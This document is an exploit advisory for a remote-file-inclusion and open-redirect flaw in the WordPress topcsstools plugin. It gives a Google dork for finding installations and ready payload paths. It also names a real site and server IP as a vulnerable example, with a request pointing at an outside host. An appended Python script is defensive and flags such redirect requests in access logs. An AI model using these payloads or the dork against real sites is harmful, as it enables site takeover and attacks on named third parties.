- #################################################################################
- # Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion and Open Redirect
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/01/2019
- # Vendor Homepage : wordpress.org - cssgallery.com
- # Software Information Links : cssgallery.com/premium-themes.html
- + cssgallery.com/css-design.html
- # Version : 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/topcsstools/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- CWE-98 [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') ]
- #################################################################################
- # Open Redirection Exploit :
- **************************
- /wp-content/plugins/topcsstools/redir.php?u=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]
- # RFI Remote File Inclusion Exploit :
- **********************************
- /wp-content/plugins/topcsstools/redir.php?u=http://[RFI-ADDRESS-HERE.gov/yourfilename.php.txt]
- #################################################################################
- # Example Vulnerable Site :
- *************************
- [+] cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=http://exploit4arab.org/
- Note : (50.63.43.1) => There are 3,158 domains hosted on this server.
- #################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################
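
Added example, not part of the original paste: a log triage script for defenders that flags requests to the redir.php path named above whose u parameter points to a host the site does not own. The access-log format, the own-host set ("blog.example") and the sample lines (constructed, using documentation addresses) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name come from the advisory above.
REDIR_PATH = "/wp-content/plugins/topcsstools/redir.php"
# Assumption: common/combined log format, request field "METHOD target HTTP/x".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def external_target(request_target, own_hosts):
    """Return the off-site host named in u=, or None if nothing is suspicious."""
    try:
        parts = urlsplit(request_target)
    except ValueError:
        return None
    if parts.path.lower() != REDIR_PATH:
        return None
    for value in parse_qs(parts.query).get("u", []):  # parse_qs percent-decodes
        # Browsers treat backslashes as slashes, so normalise before parsing.
        candidate = value.strip().replace("\\", "/")
        try:
            host = urlsplit(candidate).hostname  # also covers //host/ forms
        except ValueError:
            return "unparseable"  # malformed authority: worth a manual look
        if host and host not in own_hosts:
            return host
    return None


def scan(log_lines, own_hosts):
    """Return (client_ip, external_host) for every flagged log line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match:
            host = external_target(match.group(1), own_hosts)
            if host:
                hits.append((line.split(" ", 1)[0], host))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jan/2019:10:00:01 +0000] "GET /wp-content/plugins/topcsstools/redir.php?u=https://offsite.example/ HTTP/1.1" 302 0',
    '198.51.100.8 - - [14/Jan/2019:10:00:02 +0000] "GET /wp-content/plugins/topcsstools/redir.php?u=http%3A%2F%2Foffsite.example%2Fa.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Jan/2019:10:00:03 +0000] "GET /wp-content/plugins/topcsstools/redir.php?u=https://blog.example/about HTTP/1.1" 302 0',
    '203.0.113.6 - - [14/Jan/2019:10:00:04 +0000] "GET /wp-content/plugins/topcsstools/redir.php?u=//offsite.example/x HTTP/1.1" 302 0',
    '203.0.113.9 - - [14/Jan/2019:10:00:05 +0000] "GET /index.php?u=https://offsite.example/ HTTP/1.1" 200 900',
]
```

Calling scan(SAMPLE_LOG, {"blog.example"}) returns the three requests whose u value resolves to an off-site host; the same-site redirect and the unrelated index.php request are ignored.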